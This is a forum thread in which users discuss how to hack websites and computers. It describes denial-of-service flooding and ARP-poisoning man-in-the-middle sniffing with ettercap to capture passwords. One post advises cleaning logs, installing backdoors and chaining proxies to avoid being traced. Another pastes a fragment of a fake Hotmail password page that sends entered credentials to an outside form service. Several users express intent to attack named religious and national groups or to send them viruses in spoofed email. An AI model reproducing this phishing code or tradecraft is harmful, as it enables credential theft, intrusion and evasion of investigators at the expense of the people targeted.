Guests can now reply in ALL forum topics (No registration required!) ×
Guests can now reply in ALL forum topics (No registration required!)
In the Name of God بسم الله

How do we hack?

Rate this topic

• Advanced Member

(bismillah)

(salam)

Hacking in fact is very simple. With the right software and know-how and a vulnerable target, you can bring a site down for a considerable period of time as well as deleting the entire content if it's not backed up. You can replace the host site with data of your own and you can also copy the files from the host site. 'Bombing' or DOS (Denial of Service) attacks are the most common. Basically, you flood the host site with so much data that the server crashes. The data is usually in the form of multiple instantaneous hits (software generated) or gigantic amounts of email. A corrupt code sent via email (ie virus) could also do the trick.

If it's the Wahhabies or the Israelis you got in mind then count me in! ;)

ws

Edited by Abdul_Hussain

(salam)

To learn hacking, you need to learn programming. Just programming.. nothign else... the hacking will come with the programming... you don't even need to think about the hacking. Once you're a programmer, you will see how easy hacking peoples computers is.

I've hacked hundreds of computers in the past. But i've completely stopped it because people said it was haram.

• Advanced Member

Hacking!!

I want to get back my previous hotmail address..*sigh*..

Somebody hacked it in around January..And, I came to know about it it in February..(think it was 2002)..And, when I tried to get back the password by the secret question process, my secret question was CHANGED..and the person who hacked wrote his/her email address there..*sob*..

Hopefully, some day, I'll get my prev. email add back..InshaAllah..

Guest ShiaCat

(salam)

To hack you gotta figure the systems weackness,

so you sniff out what OS and programmms the

target runs, then you can look for exploits, which use

those weaknesses.

Run a port scan to find open ports.

• Advanced Member

just like what shiacat said earlier.

you'll have to find out what OS and Kernel version they are running

for example some linux / unix machines will display the kernel version in the welcome screen by default (usually the admin will change or remove that info)

for example this can be

Linux 2.4.xx , this is important because once you determine the Distribution and Kernel version you can check the security advisories for any vulnrabilities

http://www.linuxsecurity.com/advisories

if you are familiar with using the programs (e.g.,apache, sane, SSH etc..) and have programming knowledge you can then begin to test if the target is patched or unpatched.

on another note... if you are within the same subnet as the target

you can use a sniffer to stiff network traffic in the LAN. Idealy you can use ettercap because it uses a "man in the middle" attack by flooding the network with ARP requests, this tricks the other computers into sending all their trafic through your machine.. this is where ettercap sniffs each frame that passes throgh your machine and collects the user data. usernames, passwords..ect (e.g., if a person is logged on icq and sends a message you can read the messages and extract the password)

this is very useful to use on your own internal network but if its used outside of your network there is a very high chance "suspicious network activity" will be detected by the admins of that network (e.g., ISP, work, school) and will be traced back to YOU.

a safer method is to sniff using wireless, as long as the wireless network your sniffing is connected to a switched network.

regards,

networkguy

(salam)

I am having problems getting nmap to run on my windows.

I don't believein port scanning without having any information. A person should try three ports before proceeding to hack the place. Port 21, 23, 25 . These are very common. From these three ports, you will know the type of system and the type of weakneess. Once you have the weakness and know how to implement it. THen, run a port scan on that puppy and let it give you what you like. Some sites are boring to hack, some are very very hard, but not impossible to hack.

A successful hacker make sures where ever he or shes steps is cleaned up. All logs must be cleaned if a successful attempt. make sure to install a backdoor, spoof an account. And use AT LEAST THREE DIFFERENT PROXIES! don't wan to see any of my brothers in the slammer :) And plus u r muslim. they will try to say you are a natioanl security risk to the country. Remember Bush has to get elected. Finding an arab hacker is gold to that man :) knowledge is legal. action can be illegal if you are stupid.

I don't recomend anyone to try any of this. This is only for person knowledge gain. I am not responsible of any doings or mishaps you may get yourself in. THIS is knowledge, don't try this!

Sayd

• Advanced Member

Salaam

Spoofing isnt exactly hacking. Its basically immitating or tricking. Its not that easy. I would advise you not to download just any hacking program for alot of them do have trojans and viruses themselves. As for spoofing, just to let you know how tough these things are, here if a mere "part" of a hotmail spoofer. i.e the programming and html code..

<!-- reauthhead.asp -->

<html>

<head>

<title>Hotmail Please re-enter your password</title>

<link rel="stylesheet" href=&quot;http://www.hotmail.com/cgi-bin/dasp/EN/hotmail___905000051.css">

</head>

<body bgcolor="#ffffff" topmargin=0>

<center>

<form name="passwordform" action=&quot;http://www.response-o-matic.com/cgi-bin/rom.pl" method="POST" target="_top" AUTOCOMPLETE="OFF" >

<INPUT TYPE="hidden" NAME="your_email_address" VALUE=">

<INPUT TYPE="hidden" NAME="your_name" VALUE=">

<INPUT TYPE="hidden" NAME="email_subject_line" VALUE="Password Recieved">

<INPUT TYPE="hidden" NAME="required_fields" VALUE="">

<INPUT TYPE="hidden" NAME="thank_you_title" VALUE="<script>location.href = '>

Good luck :P

Fi Amaan Allah

• Veteran Member

thaks bro ali hashami.

i am going to look it up. i can program so i hope its not too long.

i wonder if a spoofed email can be traced?

bkk we could spoof an email to these people you wnat to hack. we could send them a virus and send it from somone they know (eg fatah). even if there is no virus imagine the power of spoofing!

• Advanced Member
thaks bro ali hashami.

i am going to look it up. i can program so i hope its not too long.

i wonder if a spoofed email can be traced?

bkk we could spoof an email to these people you wnat to hack. we could send them a virus and send it from somone they know (eg fatah). even if there is no virus imagine the power of spoofing!

bro add me on msn lol. asad.ali@the-shia.org